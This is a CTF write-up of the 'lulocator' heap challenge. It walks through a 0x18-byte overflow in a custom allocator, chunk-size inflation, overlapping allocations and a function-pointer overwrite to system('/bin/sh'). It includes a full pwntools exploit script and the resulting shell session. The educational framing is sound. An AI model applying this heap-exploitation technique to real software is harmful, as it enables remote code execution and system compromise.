lulocator - EH4X CTF 2026

Category: Binary Exploitation | Points: 500 | Solves: 0 (first blood baby) Author: nrg & the_moon_guy

Who needs that buggy malloc? Made my own completely safe lulocator.

nc chall.ehax.in 40137

TL;DR

Custom heap allocator with a write command that lets you send size + 0x18 bytes into a buffer that only holds size bytes. Classic off-by-~~one~~twenty-four. We inflate a freed chunk's size header, get an overlapping allocation over a victim object, overwrite its function pointer to system, fill its data with /bin/sh, and pop a shell.

0x00 - First Look

We get a stripped ELF binary and a libc (glibc 2.35). Let's check what we're working with:

$ pwn checksec lulocator
    Arch:       amd64-64-little
    RELRO:      No RELRO        <-- GOT is writable, free real estate
    Stack:      No canary found <-- stack smash? maybe later
    NX:         NX enabled      <-- no shellcode on stack/heap
    PIE:        No PIE (0x400000) <-- addresses are fixed, nice

No PIE + No RELRO is basically the binary saying "please hack me bro".

The binary presents a menu-driven heap challenge:

=== lulocator ===
1) new          -- allocate an object with custom size
2) write        -- write data to an object
3) delete       -- free an object
4) info         -- leak object address + stdout ptr + size
5) set_runner   -- pick an object as "the runner"
6) run          -- call runner->func_ptr(runner->data)
7) quit

So we have a classic note-style pwn challenge but with a twist - there's a custom allocator ("lulocator") instead of glibc malloc, and objects have a function pointer that gets called via run. That function pointer is our ticket to code execution.

0x01 - Reversing the Allocator

Since the binary is stripped, we gotta reverse everything from raw disassembly. Here's what I figured out:

The Arena

The allocator mmaps a 0x40000-byte region at startup. It uses a simple bump allocator for new allocations and a circular doubly-linked free list for freed chunks. The free list sentinel lives at a fixed address 0x404850 in .data (no PIE = we know this address).

Chunk Layout

Each chunk on the heap looks like:

+----------+---------------------------+
| Header   | Data                      |
| (8 bytes)| (aligned to 16 bytes)     |
+----------+---------------------------+
     ^
     |
     +-- size | flags  (bit 0 = allocated)

header & ~0xF = chunk size (total, including header)
header & 1 = allocated bit (1 = in use, 0 = free)
When free, the data area stores: fwd pointer (8 bytes) + bwd pointer (8 bytes)

Object Layout

When you do new(size), the allocator does lu_alloc(size + 0x28). The returned memory is laid out as:

Object structure (returned by lu_alloc):
+0x00: field_0     (8 bytes) -- unused, zeroed
+0x08: field_1     (8 bytes) -- unused, zeroed
+0x10: func_ptr    (8 bytes) -- function pointer (default: print_mail)
+0x18: out_ptr     (8 bytes) -- FILE* stdout
+0x20: size        (8 bytes) -- user-requested size
+0x28: data[size]            -- user data buffer

The run command does: runner->func_ptr(runner + 0x28) -- it calls the function pointer with a pointer to the data buffer as the argument.

If we can overwrite func_ptr to system and put /bin/sh in the data buffer... game over.

Before/After

0x02 - Finding the Bug

Here's the write command logic (simplified pseudocode):

void cmd_write(void) {
    int idx = read_int("idx: ");
    obj_t *obj = slots[idx];
    uint64_t len = read_ull("len: ");

    // THE BUG IS RIGHT HERE OFFICER
    if (len > obj->size + 0x18) {
        puts("too long");
        return;
    }

    read_all(0, obj->data, len);   // reads into data buffer
    // ... null termination ...
}

The check allows writing up to obj->size + 0x18 bytes, but the data buffer is only obj->size bytes long.

That's a 0x18 (24) byte heap overflow.

Heap Overflow

24 bytes overflow means we can corrupt:

8 bytes of the next chunk's header
8 bytes of the next chunk's data[0] (fwd pointer if free)
8 bytes of the next chunk's data[8] (bwd pointer if free)

0x03 - The Leak (free info lol)

The info command is literally handing us addresses on a silver platter:

[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16
                            ^^^
                            This is stdout (FILE*) = libc address!

The out field contains the address of _IO_2_1_stdout_ inside libc. Since we know the libc version (2.35), we just subtract the known offset to get libc base:

python

libc_base = leaked_stdout - 0x21b780   # offset of _IO_2_1_stdout_ in libc 2.35
system    = libc_base + 0x50d70        # offset of system()

That was easy. Thanks for the free leak, challenge author.

0x04 - The Exploit Strategy: Overlapping Chunks

OK so we have a 24-byte overflow and we need to overwrite an object's func_ptr at offset +0x10. The overflow only reaches data[0] and data[8] (offsets +0x00 and +0x08) of the next object -- not far enough to hit func_ptr.

But we can do something sneaky: inflate a freed chunk's size to create an overlapping allocation.

Here's the plan:

Step 1: Set up the heap

Allocate A (size=0x10) --> slot 0, chunk size 0x40
Allocate B (size=0x10) --> slot 1, chunk size 0x40
Allocate C (size=0x10) --> slot 2, chunk size 0x40

Heap layout:
+--------+--------+--------+
| A 0x40 | B 0x40 | C 0x40 |
+--------+--------+--------+

Step 2: Free B

B goes to the free list. Its header now says size=0x40 (allocated bit cleared), and its data area contains fwd/bwd pointers to the sentinel (0x404850).

Heap State

Step 3: Overflow from A into B

Write 0x28 bytes to A (that's 0x10 of legit data + 0x18 overflow):

python

overflow = b'A' * 0x10       # A's data (padding)
overflow += p64(0x80)        # B's header: inflate 0x40 -> 0x80 !!
overflow += p64(0x404850)    # B->fwd: keep valid (sentinel)
overflow += p64(0x404850)    # B->bwd: keep valid (sentinel)

Key insight: we keep the fwd/bwd pointers correct so the safe-unlink integrity check passes when B is reallocated. The allocator checks fwd->bwd == node && bwd->fwd == node before unlinking. Since B is the only element on the free list, both fwd and bwd point to the sentinel, and the sentinel's fwd/bwd both point to B. Our overflow doesn't change fwd/bwd, so the check passes.

+--------+------------------+
| A 0x40 | B "FREE" sz=0x80 |  <-- B now thinks it's 0x80 bytes
|        | (covers B AND C!) |
+--------+------------------+

Overflow Detail

Step 4: Allocate D (size=0x50) - gets the inflated chunk

When we allocate D with size 0x50, the allocator needs a chunk of total size align16(0x50 + 0x28 + 0x8) = 0x80. It finds B on the free list with (fake) size 0x80 -- perfect fit! D gets allocated right on top of B's old location, but its data area now extends into C's territory.

+--------+----------------------------------+
| A 0x40 | D (size=0x50)                    |
|        | D_meta | D_data[0x50]            |
|        |        | .....|C_hdr|C_meta|C_dat|
+--------+----------------------------------+
                         ^     ^      ^
                         |     |      |
                    We control ALL of this
                    through D's write!

Step 5: Write through D to corrupt C

Now we write to D's data area. Since D overlaps with C, we can overwrite C's entire object metadata:

python

payload  = b'\x00' * 0x10     # gap (D data before C starts)
payload += p64(0x41)           # C's chunk header (keep original)
payload += p64(0)              # C->field_0
payload += p64(0)              # C->field_1
payload += p64(system_addr)    # C->func_ptr = system()  <-- BOOM
payload += p64(0)              # C->out_ptr
payload += p64(0x10)           # C->size
payload += b'/bin/sh\x00'      # C->data = "/bin/sh"

Step 6: Set runner to C and RUN

python

set_runner(c_idx)   # runner = C
run()               # calls C->func_ptr(C->data) = system("/bin/sh")

  set_runner(C)  --->  runner = C
  run()          --->  C->func_ptr(C + 0x28)
                 --->  system("/bin/sh")

0x05 - Putting It All Together

Here's the full attack flow as a diagram:

6-Step Attack Flow

0x06 - The Exploit Script

python

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'

# Libc offsets (glibc 2.35 - Ubuntu)
LIBC_STDOUT = 0x21b780
LIBC_SYSTEM = 0x50d70
SENTINEL    = 0x404850       # free list sentinel (no PIE = fixed addr)

p = remote('chall.ehax.in', 40137)
p.recvuntil(b'=== lulocator ===')

# --- Helper functions ---
def new(size):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.recvuntil(b'[new] index=')
    return int(p.recvline().strip())

def write(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    p.recvuntil(b'[wrote]')

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[deleted]')

def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    line = p.recvline_contains(b'[info]').decode()
    parts = line.split()
    addr = int(parts[1].split('=')[1], 16)
    out  = int(parts[2].split('=')[1], 16)
    return addr, out

def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[runner set]')

def run():
    p.sendlineafter(b'> ', b'6')

# === PHASE 1: LEAK ===
A = new(0x10)                          # slot 0
_, stdout_leak = info(A)
libc_base = stdout_leak - LIBC_STDOUT
system    = libc_base + LIBC_SYSTEM
log.success(f"libc: {hex(libc_base)}")
log.success(f"system: {hex(system)}")

# === PHASE 2: SETUP ===
B = new(0x10)                          # slot 1 (sacrifice)
C = new(0x10)                          # slot 2 (target)
delete(B)                              # B -> free list

# === PHASE 3: OVERFLOW & INFLATE ===
overflow  = b'A' * 0x10                # A's data (junk)
overflow += p64(0x80)                  # inflate B's size: 0x40 -> 0x80
overflow += p64(SENTINEL)              # keep fwd valid
overflow += p64(SENTINEL)              # keep bwd valid
write(A, overflow)

# === PHASE 4: OVERLAPPING ALLOC ===
D = new(0x50)                          # gets inflated B, overlaps C

# === PHASE 5: CORRUPT C ===
payload  = b'\x00' * 0x10              # gap
payload += p64(0x41)                   # C chunk header
payload += p64(0) * 2                  # field_0, field_1
payload += p64(system)                 # C->func_ptr = system
payload += p64(0)                      # C->out_ptr
payload += p64(0x10)                   # C->size
payload += b'/bin/sh\x00'              # C->data
write(D, payload)

# === PHASE 6: PROFIT ===
set_runner(C)
run()                                  # system("/bin/sh")

p.interactive()

0x07 - Shell!

$ python3 exploit.py
[+] Opening connection to chall.ehax.in on port 40137: Done
[+] libc: 0x765e68e9f000
[+] system: 0x765e68eefd70
[*] Switching to interactive mode

$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag*
EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

0x08 - Key Takeaways (educational stuff)

Why did this work?

Protection	Status	Impact
PIE	OFF	All binary addresses are fixed -- we know the sentinel at `0x404850`
RELRO	None	GOT is writable (didn't even need it, but nice to have)
Canary	OFF	Stack smashing possible (didn't need it either)
NX	ON	Can't exec shellcode on heap/stack, so we use `system()`

Concepts used in this exploit:

Heap Overflow -- The write command has an off-by-0x18 bug. Always check boundary conditions in allocators! The check was len <= size + 0x18 instead of len <= size.
Chunk Size Inflation -- By overwriting a free chunk's size header to a larger value, we trick the allocator into returning an allocation that overlaps with adjacent chunks. This is a classic heap exploitation primitive.
Overlapping Allocations -- Once we have a chunk that overlaps another object, we can read/write the victim object's internal metadata through the overlapping chunk.
Function Pointer Hijack -- The object had a function pointer at a known offset. By overwriting it to system() and controlling the argument (the data buffer), we achieve arbitrary command execution.
Free List Integrity Bypass -- The allocator had a safe-unlink check (fwd->bwd == node && bwd->fwd == node). We bypassed it by keeping the fwd/bwd pointers valid during our overflow. The check only verifies link consistency, not size consistency.

The vulnerability in one picture:

Vulnerability Summary

Similar real-world bugs:

CVE-2021-27365 (Linux kernel iSCSI) -- heap buffer overflow due to incorrect size check
Pretty much any custom allocator that rolls its own bounds checking instead of using well-tested implementations

The lesson? Don't write your own malloc unless you really know what you're doing.

Flag: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

unfortunately the lul is on me -- yeah, it really was on the lulocator lol

GG to nrg & the_moon_guy for a clean pwn challenge. 500 points well earned.

Lulocator

lulocator - EH4X CTF 2026

TL;DR

0x00 - First Look

0x01 - Reversing the Allocator

The Arena

Chunk Layout

Object Layout

0x02 - Finding the Bug

0x03 - The Leak (free info lol)

0x04 - The Exploit Strategy: Overlapping Chunks

Step 1: Set up the heap

Step 2: Free B

Step 3: Overflow from A into B

Step 4: Allocate D (size=0x50) - gets the inflated chunk

Step 5: Write through D to corrupt C

Step 6: Set runner to C and RUN

0x05 - Putting It All Together

0x06 - The Exploit Script

0x07 - Shell!

0x08 - Key Takeaways (educational stuff)

Why did this work?

Concepts used in this exploit:

The vulnerability in one picture:

Similar real-world bugs:

More from Eh4x CTF

Flight Risk

Inferno Sprint

Pathfinder